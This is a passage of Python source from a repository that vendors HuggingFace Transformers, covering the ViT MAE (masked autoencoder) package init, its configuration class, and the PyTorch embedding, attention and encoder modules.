        self.position_embedding_type = position_embedding_type
        # Initialization and normalization.
        self.initializer_range = initializer_range
        self.layer_norm_eps = layer_norm_eps
        # Decoder-only key/value caching switch.
        self.use_cache = use_cache
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,428 | src/transformers/models/vit_mae/__init__.py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import (
    OptionalDependencyNotAvailable,
    _LazyModule,
    is_flax_available,  # NOTE(review): imported but not used in this file — confirm before removing
    is_tf_available,
    is_torch_available,
)
# Declares the public API of this package; consumed by `_LazyModule` below so
# that submodules are only imported on first attribute access.
_import_structure = {"configuration_vit_mae": ["VIT_MAE_PRETRAINED_CONFIG_ARCHIVE_MAP", "ViTMAEConfig"]}
# PyTorch modeling symbols are only registered when torch is installed.
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_vit_mae"] = [
        "VIT_MAE_PRETRAINED_MODEL_ARCHIVE_LIST",
        "ViTMAEForPreTraining",
        "ViTMAELayer",
        "ViTMAEModel",
        "ViTMAEPreTrainedModel",
    ]
# TensorFlow modeling symbols are only registered when TF is installed.
try:
    if not is_tf_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_tf_vit_mae"] = [
        "TFViTMAEForPreTraining",
        "TFViTMAEModel",
        "TFViTMAEPreTrainedModel",
    ]
# For static type checkers, perform the real (eager) imports instead of the lazy proxy.
if TYPE_CHECKING:
    from .configuration_vit_mae import VIT_MAE_PRETRAINED_CONFIG_ARCHIVE_MAP, ViTMAEConfig
    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_vit_mae import (
            VIT_MAE_PRETRAINED_MODEL_ARCHIVE_LIST,
            ViTMAEForPreTraining,
            ViTMAELayer,
            ViTMAEModel,
            ViTMAEPreTrainedModel,
        )
    try:
        if not is_tf_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_tf_vit_mae import TFViTMAEForPreTraining, TFViTMAEModel, TFViTMAEPreTrainedModel
else:
    import sys
    # Replace this module object with a lazy proxy that resolves `_import_structure`
    # entries on demand.
    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 6,568 | src/transformers/models/vit_mae/configuration_vit_mae.py | # coding=utf-8
# Copyright 2022 Facebook AI and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" ViT MAE model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
VIT_MAE_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"facebook/vit-mae-base": "https://huggingface.co/facebook/vit-mae-base/resolve/main/config.json",
# See all ViT MAE models at https://huggingface.co/models?filter=vit-mae
}
class ViTMAEConfig(PretrainedConfig):
    r"""
    This is the configuration class to store the configuration of a [`ViTMAEModel`]. It is used to instantiate an ViT
    MAE model according to the specified arguments, defining the model architecture. Instantiating a configuration with
    the defaults will yield a similar configuration to that of the ViT
    [facebook/vit-mae-base](https://huggingface.co/facebook/vit-mae-base) architecture.
    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.
    Args:
        hidden_size (`int`, *optional*, defaults to 768):
            Dimensionality of the encoder layers and the pooler layer.
        num_hidden_layers (`int`, *optional*, defaults to 12):
            Number of hidden layers in the Transformer encoder.
        num_attention_heads (`int`, *optional*, defaults to 12):
            Number of attention heads for each attention layer in the Transformer encoder.
        intermediate_size (`int`, *optional*, defaults to 3072):
            Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
        hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
            The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
            `"relu"`, `"selu"` and `"gelu_new"` are supported.
        hidden_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
        attention_probs_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout ratio for the attention probabilities.
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        layer_norm_eps (`float`, *optional*, defaults to 1e-12):
            The epsilon used by the layer normalization layers.
        image_size (`int`, *optional*, defaults to 224):
            The size (resolution) of each image.
        patch_size (`int`, *optional*, defaults to 16):
            The size (resolution) of each patch.
        num_channels (`int`, *optional*, defaults to 3):
            The number of input channels.
        qkv_bias (`bool`, *optional*, defaults to `True`):
            Whether to add a bias to the queries, keys and values.
        decoder_num_attention_heads (`int`, *optional*, defaults to 16):
            Number of attention heads for each attention layer in the decoder.
        decoder_hidden_size (`int`, *optional*, defaults to 512):
            Dimensionality of the decoder.
        decoder_num_hidden_layers (`int`, *optional*, defaults to 8):
            Number of hidden layers in the decoder.
        decoder_intermediate_size (`int`, *optional*, defaults to 2048):
            Dimensionality of the "intermediate" (i.e., feed-forward) layer in the decoder.
        mask_ratio (`float`, *optional*, defaults to 0.75):
            The ratio of the number of masked tokens in the input sequence.
        norm_pix_loss (`bool`, *optional*, defaults to `False`):
            Whether or not to train with normalized pixels (see Table 3 in the paper). Using normalized pixels improved
            representation quality in the experiments of the authors.
    Example:
    ```python
    >>> from transformers import ViTMAEConfig, ViTMAEModel
    >>> # Initializing a ViT MAE vit-mae-base style configuration
    >>> configuration = ViTMAEConfig()
    >>> # Initializing a model (with random weights) from the vit-mae-base style configuration
    >>> model = ViTMAEModel(configuration)
    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""
    model_type = "vit_mae"
    def __init__(
        self,
        hidden_size=768,
        num_hidden_layers=12,
        num_attention_heads=12,
        intermediate_size=3072,
        hidden_act="gelu",
        hidden_dropout_prob=0.0,
        attention_probs_dropout_prob=0.0,
        initializer_range=0.02,
        layer_norm_eps=1e-12,
        image_size=224,
        patch_size=16,
        num_channels=3,
        qkv_bias=True,
        decoder_num_attention_heads=16,
        decoder_hidden_size=512,
        decoder_num_hidden_layers=8,
        decoder_intermediate_size=2048,
        mask_ratio=0.75,
        norm_pix_loss=False,
        **kwargs,
    ):
        super().__init__(**kwargs)
        # Encoder hyper-parameters.
        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.intermediate_size = intermediate_size
        self.hidden_act = hidden_act
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        self.initializer_range = initializer_range
        self.layer_norm_eps = layer_norm_eps
        # Image / patch geometry.
        self.image_size = image_size
        self.patch_size = patch_size
        self.num_channels = num_channels
        self.qkv_bias = qkv_bias
        # Decoder hyper-parameters (the MAE decoder is smaller than the encoder).
        self.decoder_num_attention_heads = decoder_num_attention_heads
        self.decoder_hidden_size = decoder_hidden_size
        self.decoder_num_hidden_layers = decoder_num_hidden_layers
        self.decoder_intermediate_size = decoder_intermediate_size
        # Masked-autoencoder pretraining options.
        self.mask_ratio = mask_ratio
        self.norm_pix_loss = norm_pix_loss
|
27182812/ChatGLM-LLaMA-chinese-insturct | 43,355 | src/transformers/models/vit_mae/modeling_vit_mae.py | # coding=utf-8
# Copyright 2022 Facebook AI and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch ViT MAE (masked autoencoder) model."""
import collections.abc
import math
from copy import deepcopy
from dataclasses import dataclass
from typing import Optional, Set, Tuple, Union
import numpy as np
import torch
import torch.utils.checkpoint
from torch import nn
from ...activations import ACT2FN
from ...modeling_outputs import BaseModelOutput
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import find_pruneable_heads_and_indices, prune_linear_layer
from ...utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_vit_mae import ViTMAEConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "ViTMAEConfig"
_CHECKPOINT_FOR_DOC = "facebook/vit-mae-base"
VIT_MAE_PRETRAINED_MODEL_ARCHIVE_LIST = [
"facebook/vit-mae-base",
# See all ViTMAE models at https://huggingface.co/models?filter=vit_mae
]
@dataclass
class ViTMAEModelOutput(ModelOutput):
    """
    Class for ViTMAEModel's outputs, with potential hidden states and attentions.
    Args:
        last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
            Sequence of hidden-states at the output of the last layer of the model.
        mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`):
            Tensor indicating which patches are masked (1) and which are not (0).
        ids_restore (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
            Tensor containing the original index of the (shuffled) masked patches.
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer
            plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
            the self-attention heads.
    """
    # All fields default to None so the output can be constructed partially
    # (e.g. when output_hidden_states/output_attentions are disabled), hence Optional.
    last_hidden_state: Optional[torch.FloatTensor] = None
    mask: Optional[torch.LongTensor] = None
    ids_restore: Optional[torch.LongTensor] = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ViTMAEDecoderOutput(ModelOutput):
    """
    Class for ViTMAEDecoder's outputs, with potential hidden states and attentions.
    Args:
        logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, patch_size ** 2 * num_channels)`):
            Pixel reconstruction logits.
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer
            plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
            the self-attention heads.
    """
    # Fields default to None (optional outputs), hence the Optional annotations.
    logits: Optional[torch.FloatTensor] = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ViTMAEForPreTrainingOutput(ModelOutput):
    """
    Class for ViTMAEForPreTraining's outputs, with potential hidden states and attentions.
    Args:
        loss (`torch.FloatTensor` of shape `(1,)`):
            Pixel reconstruction loss.
        logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, patch_size ** 2 * num_channels)`):
            Pixel reconstruction logits.
        mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`):
            Tensor indicating which patches are masked (1) and which are not (0).
        ids_restore (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
            Tensor containing the original index of the (shuffled) masked patches.
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer
            plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
            the self-attention heads.
    """
    # Fields default to None (optional outputs), hence the Optional annotations.
    loss: Optional[torch.FloatTensor] = None
    logits: Optional[torch.FloatTensor] = None
    mask: Optional[torch.LongTensor] = None
    ids_restore: Optional[torch.LongTensor] = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
def get_2d_sincos_pos_embed(embed_dim, grid_size, add_cls_token=False):
    """
    Create 2D sin/cos positional embeddings.
    Args:
        embed_dim (`int`):
            Embedding dimension.
        grid_size (`int`):
            The grid height and width.
        add_cls_token (`bool`, *optional*, defaults to `False`):
            Whether or not to add a classification (CLS) token.
    Returns:
        `np.ndarray` of shape `(grid_size*grid_size, embed_dim)` (or `(1 + grid_size*grid_size, embed_dim)` when
        `add_cls_token=True`): the position embeddings (with or without the classification token).
    """
    # Build the coordinate grid; the width axis varies fastest, matching the
    # original MAE reference implementation.
    axis = np.arange(grid_size, dtype=np.float32)
    coords = np.meshgrid(axis, axis)  # here w goes first
    coords = np.stack(coords, axis=0).reshape([2, 1, grid_size, grid_size])
    embeddings = get_2d_sincos_pos_embed_from_grid(embed_dim, coords)
    if not add_cls_token:
        return embeddings
    # Prepend one all-zero row that serves as the CLS token position.
    return np.concatenate([np.zeros([1, embed_dim]), embeddings], axis=0)
def get_2d_sincos_pos_embed_from_grid(embed_dim, grid):
    """Combine per-axis 1D sin/cos tables into a 2D positional embedding of size `embed_dim`."""
    if embed_dim % 2:
        raise ValueError("embed_dim must be even")
    # Half of the channels encode the height coordinate, the other half the width.
    half_dim = embed_dim // 2
    emb_height = get_1d_sincos_pos_embed_from_grid(half_dim, grid[0])  # (H*W, D/2)
    emb_width = get_1d_sincos_pos_embed_from_grid(half_dim, grid[1])  # (H*W, D/2)
    return np.concatenate([emb_height, emb_width], axis=1)  # (H*W, D)
def get_1d_sincos_pos_embed_from_grid(embed_dim, pos):
    """
    embed_dim: output dimension for each position pos: a list of positions to be encoded: size (M,) out: (M, D)
    """
    if embed_dim % 2 != 0:
        raise ValueError("embed_dim must be even")
    # Classic Transformer sinusoid frequencies: 1 / 10000^(2i/D) for i in [0, D/2).
    frequencies = 1.0 / 10000 ** (np.arange(embed_dim // 2, dtype=float) / (embed_dim / 2.0))
    # Outer product of positions and frequencies gives the phase angles.
    angles = np.outer(pos.reshape(-1), frequencies)  # (M, D/2)
    # First half of the channels are sines, second half cosines.
    return np.concatenate([np.sin(angles), np.cos(angles)], axis=1)  # (M, D)
class ViTMAEEmbeddings(nn.Module):
    """
    Construct the CLS token, position and patch embeddings.
    """

    def __init__(self, config):
        super().__init__()
        self.cls_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size))
        self.patch_embeddings = ViTMAEPatchEmbeddings(config)
        self.num_patches = self.patch_embeddings.num_patches
        # Position embeddings are a frozen (non-trainable) sin-cos table; it is
        # filled in by `initialize_weights` below.
        self.position_embeddings = nn.Parameter(
            torch.zeros(1, self.num_patches + 1, config.hidden_size), requires_grad=False
        )
        self.config = config
        self.initialize_weights()

    def initialize_weights(self):
        """Fill the frozen sin-cos position table and initialize the learnable parameters."""
        grid_size = int(self.patch_embeddings.num_patches**0.5)
        sincos_table = get_2d_sincos_pos_embed(self.position_embeddings.shape[-1], grid_size, add_cls_token=True)
        self.position_embeddings.data.copy_(torch.from_numpy(sincos_table).float().unsqueeze(0))
        # Initialize the patch projection the way nn.Linear would be initialized:
        # the conv really acts as a per-patch linear layer.
        projection_weight = self.patch_embeddings.projection.weight.data
        torch.nn.init.xavier_uniform_(projection_weight.view([projection_weight.shape[0], -1]))
        # timm's trunc_normal_(std=.02) is effectively normal_(std=0.02) as cutoff is too big (2.)
        torch.nn.init.normal_(self.cls_token, std=self.config.initializer_range)

    def random_masking(self, sequence, noise=None):
        """
        Perform per-sample random masking by per-sample shuffling. Per-sample shuffling is done by argsort random
        noise.
        Args:
            sequence (`torch.LongTensor` of shape `(batch_size, sequence_length, dim)`)
            noise (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*) which is
                mainly used for testing purposes to control randomness and maintain the reproducibility
        """
        batch_size, seq_length, dim = sequence.shape
        len_keep = int(seq_length * (1 - self.config.mask_ratio))
        if noise is None:
            noise = torch.rand(batch_size, seq_length, device=sequence.device)  # noise in [0, 1]
        # Sorting the noise yields a random permutation per sample: the patches
        # with the smallest noise values are kept, the rest are dropped.
        ids_shuffle = torch.argsort(noise, dim=1)
        ids_restore = torch.argsort(ids_shuffle, dim=1)  # inverse permutation
        ids_keep = ids_shuffle[:, :len_keep]
        sequence_unmasked = torch.gather(sequence, dim=1, index=ids_keep.unsqueeze(-1).repeat(1, 1, dim))
        # Binary mask in the *original* patch order: 0 = kept, 1 = removed.
        mask = torch.ones([batch_size, seq_length], device=sequence.device)
        mask[:, :len_keep] = 0
        mask = torch.gather(mask, dim=1, index=ids_restore)
        return sequence_unmasked, mask, ids_restore

    def forward(self, pixel_values, noise=None):
        batch_size, num_channels, height, width = pixel_values.shape
        patch_tokens = self.patch_embeddings(pixel_values)
        # Add the non-CLS part of the position embeddings *before* masking so
        # every kept patch carries its original positional information.
        patch_tokens = patch_tokens + self.position_embeddings[:, 1:, :]
        patch_tokens, mask, ids_restore = self.random_masking(patch_tokens, noise)
        # Prepend the CLS token with its own position embedding.
        cls_token = self.cls_token + self.position_embeddings[:, :1, :]
        cls_tokens = cls_token.expand(patch_tokens.shape[0], -1, -1)
        embeddings = torch.cat((cls_tokens, patch_tokens), dim=1)
        return embeddings, mask, ids_restore
class ViTMAEPatchEmbeddings(nn.Module):
    """
    This class turns `pixel_values` of shape `(batch_size, num_channels, height, width)` into the initial
    `hidden_states` (patch embeddings) of shape `(batch_size, seq_length, hidden_size)` to be consumed by a
    Transformer.
    """

    def __init__(self, config):
        super().__init__()
        image_size = config.image_size
        patch_size = config.patch_size
        # Accept either a single int or an (height, width) iterable.
        if not isinstance(image_size, collections.abc.Iterable):
            image_size = (image_size, image_size)
        if not isinstance(patch_size, collections.abc.Iterable):
            patch_size = (patch_size, patch_size)
        self.image_size = image_size
        self.patch_size = patch_size
        self.num_channels = config.num_channels
        # Number of non-overlapping patches that tile the image.
        self.num_patches = (image_size[1] // patch_size[1]) * (image_size[0] // patch_size[0])
        # A patch-strided convolution is equivalent to a per-patch linear projection.
        self.projection = nn.Conv2d(config.num_channels, config.hidden_size, kernel_size=patch_size, stride=patch_size)

    def forward(self, pixel_values):
        batch_size, num_channels, height, width = pixel_values.shape
        if num_channels != self.num_channels:
            raise ValueError(
                "Make sure that the channel dimension of the pixel values match with the one set in the configuration."
            )
        if height != self.image_size[0] or width != self.image_size[1]:
            raise ValueError(
                f"Input image size ({height}*{width}) doesn't match model ({self.image_size[0]}*{self.image_size[1]})."
            )
        # (B, C, H, W) -> (B, hidden, H/p, W/p) -> (B, num_patches, hidden)
        return self.projection(pixel_values).flatten(2).transpose(1, 2)
# Copied from transformers.models.vit.modeling_vit.ViTSelfAttention ViT->ViTMAE
class ViTMAESelfAttention(nn.Module):
    """Multi-head self-attention: projects hidden states to query/key/value,
    computes scaled dot-product attention, and merges the heads back."""

    def __init__(self, config: "ViTMAEConfig") -> None:
        super().__init__()
        if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
            # Bug fix: the f-string previously interpolated `{config.hidden_size,}`
            # (trailing comma), which rendered the size as a one-element tuple,
            # e.g. "The hidden size (768,) is not ...". Print the plain integer.
            raise ValueError(
                f"The hidden size {config.hidden_size} is not a multiple of the number of attention "
                f"heads {config.num_attention_heads}."
            )
        self.num_attention_heads = config.num_attention_heads
        self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        self.query = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
        self.key = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
        self.value = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
        self.dropout = nn.Dropout(config.attention_probs_dropout_prob)

    def transpose_for_scores(self, x: torch.Tensor) -> torch.Tensor:
        # (batch, seq, all_head_size) -> (batch, num_heads, seq, head_size)
        new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
        x = x.view(new_x_shape)
        return x.permute(0, 2, 1, 3)

    def forward(
        self, hidden_states, head_mask: Optional[torch.Tensor] = None, output_attentions: bool = False
    ) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
        """Returns `(context_layer,)` or `(context_layer, attention_probs)` when
        `output_attentions=True`."""
        mixed_query_layer = self.query(hidden_states)
        key_layer = self.transpose_for_scores(self.key(hidden_states))
        value_layer = self.transpose_for_scores(self.value(hidden_states))
        query_layer = self.transpose_for_scores(mixed_query_layer)
        # Take the dot product between "query" and "key" to get the raw attention scores.
        attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
        attention_scores = attention_scores / math.sqrt(self.attention_head_size)
        # Normalize the attention scores to probabilities.
        attention_probs = nn.functional.softmax(attention_scores, dim=-1)
        # This is actually dropping out entire tokens to attend to, which might
        # seem a bit unusual, but is taken from the original Transformer paper.
        attention_probs = self.dropout(attention_probs)
        # Mask heads if we want to
        if head_mask is not None:
            attention_probs = attention_probs * head_mask
        context_layer = torch.matmul(attention_probs, value_layer)
        # (batch, num_heads, seq, head_size) -> (batch, seq, all_head_size)
        context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
        new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
        context_layer = context_layer.view(new_context_layer_shape)
        outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
        return outputs
# Copied from transformers.models.vit.modeling_vit.ViTSelfOutput with ViT->ViTMAE
class ViTMAESelfOutput(nn.Module):
    """
    The residual connection is defined in ViTMAELayer instead of here (as is the case with other models), due to the
    layernorm applied before each block.
    """

    def __init__(self, config: ViTMAEConfig) -> None:
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
        # `input_tensor` is accepted for interface parity with other *SelfOutput
        # modules but is intentionally unused: the residual add happens in ViTMAELayer.
        projected = self.dense(hidden_states)
        return self.dropout(projected)
# Copied from transformers.models.vit.modeling_vit.ViTAttention with ViT->ViTMAE
class ViTMAEAttention(nn.Module):
    """Bundles ViTMAESelfAttention with its output projection and supports head pruning."""

    def __init__(self, config: ViTMAEConfig) -> None:
        super().__init__()
        self.attention = ViTMAESelfAttention(config)
        self.output = ViTMAESelfOutput(config)
        self.pruned_heads = set()

    def prune_heads(self, heads: Set[int]) -> None:
        """Remove the given attention heads and the matching slices of every projection."""
        if not heads:
            return
        heads, index = find_pruneable_heads_and_indices(
            heads, self.attention.num_attention_heads, self.attention.attention_head_size, self.pruned_heads
        )
        # Drop the pruned rows from q/k/v and the matching columns of the output.
        for name in ("query", "key", "value"):
            setattr(self.attention, name, prune_linear_layer(getattr(self.attention, name), index))
        self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
        # Keep the head bookkeeping in sync with the reduced projections.
        self.attention.num_attention_heads = self.attention.num_attention_heads - len(heads)
        self.attention.all_head_size = self.attention.attention_head_size * self.attention.num_attention_heads
        self.pruned_heads = self.pruned_heads.union(heads)

    def forward(
        self,
        hidden_states: torch.Tensor,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: bool = False,
    ) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
        attention_results = self.attention(hidden_states, head_mask, output_attentions)
        projected = self.output(attention_results[0], hidden_states)
        # Re-attach the attention probabilities when they were requested.
        return (projected,) + attention_results[1:]
# Copied from transformers.models.vit.modeling_vit.ViTIntermediate ViT->ViTMAE
class ViTMAEIntermediate(nn.Module):
    """Feed-forward expansion (hidden_size -> intermediate_size) followed by the activation."""

    def __init__(self, config: ViTMAEConfig) -> None:
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
        # The activation may be given either as a registry key (str) or as a callable.
        if isinstance(config.hidden_act, str):
            self.intermediate_act_fn = ACT2FN[config.hidden_act]
        else:
            self.intermediate_act_fn = config.hidden_act

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        return self.intermediate_act_fn(self.dense(hidden_states))
# Copied from transformers.models.vit.modeling_vit.ViTOutput ViT->ViTMAE
class ViTMAEOutput(nn.Module):
    """Feed-forward contraction (intermediate_size -> hidden_size) plus the residual add."""

    def __init__(self, config: ViTMAEConfig) -> None:
        super().__init__()
        self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
        # Project back down, regularize, then add the residual branch.
        return self.dropout(self.dense(hidden_states)) + input_tensor
# Copied from transformers.models.vit.modeling_vit.ViTLayer with ViT->ViTMAE
class ViTMAELayer(nn.Module):
    """This corresponds to the Block class in the timm implementation."""

    def __init__(self, config: ViTMAEConfig) -> None:
        super().__init__()
        self.chunk_size_feed_forward = config.chunk_size_feed_forward
        self.seq_len_dim = 1
        self.attention = ViTMAEAttention(config)
        self.intermediate = ViTMAEIntermediate(config)
        self.output = ViTMAEOutput(config)
        # Pre-norm architecture: layernorm runs before attention and before the MLP.
        self.layernorm_before = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.layernorm_after = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)

    def forward(
        self,
        hidden_states: torch.Tensor,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: bool = False,
    ) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
        # Attention sub-block (pre-norm) with residual connection.
        attention_results = self.attention(
            self.layernorm_before(hidden_states),
            head_mask,
            output_attentions=output_attentions,
        )
        hidden_states = attention_results[0] + hidden_states
        # MLP sub-block (pre-norm); the second residual add happens inside self.output.
        mlp_output = self.output(self.intermediate(self.layernorm_after(hidden_states)), hidden_states)
        # Re-attach attention probabilities when they were requested.
        return (mlp_output,) + attention_results[1:]
# Copied from transformers.models.vit.modeling_vit.ViTEncoder with ViT->ViTMAE
class ViTMAEEncoder(nn.Module):
    """Stack of ViTMAELayer blocks with optional gradient checkpointing."""

    def __init__(self, config: ViTMAEConfig) -> None:
        super().__init__()
        self.config = config
        self.layer = nn.ModuleList(ViTMAELayer(config) for _ in range(config.num_hidden_layers))
        self.gradient_checkpointing = False

    def forward(
        self,
        hidden_states: torch.Tensor,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: bool = False,
        output_hidden_states: bool = False,
        return_dict: bool = True,
    ) -> Union[tuple, BaseModelOutput]:
        all_hidden_states = () if output_hidden_states else None
        all_self_attentions = () if output_attentions else None
        for layer_index, block in enumerate(self.layer):
            if output_hidden_states:
                # Record the state *entering* each layer; the final state is added below.
                all_hidden_states = all_hidden_states + (hidden_states,)
            layer_head_mask = None if head_mask is None else head_mask[layer_index]
            if self.gradient_checkpointing and self.training:
                # Recompute activations in the backward pass to save memory.
                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        return module(*inputs, output_attentions)

                    return custom_forward

                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(block),
                    hidden_states,
                    layer_head_mask,
                )
            else:
                layer_outputs = block(hidden_states, layer_head_mask, output_attentions)
            hidden_states = layer_outputs[0]
            if output_attentions:
                all_self_attentions = all_self_attentions + (layer_outputs[1],)
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        if not return_dict:
            return tuple(v for v in (hidden_states, all_hidden_states, all_self_attentions) if v is not None)
        return BaseModelOutput(
            last_hidden_state=hidden_states,
            hidden_states=all_hidden_states,
            attentions=all_self_attentions,
        )
class ViTMAEPreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """

    config_class = ViTMAEConfig
    base_model_prefix = "vit"
    main_input_name = "pixel_values"
    supports_gradient_checkpointing = True

    def _init_weights(self, module):
        """Initialize the weights"""
        if isinstance(module, nn.LayerNorm):
            module.weight.data.fill_(1.0)
            module.bias.data.zero_()
        elif isinstance(module, (nn.Linear, nn.Conv2d)):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
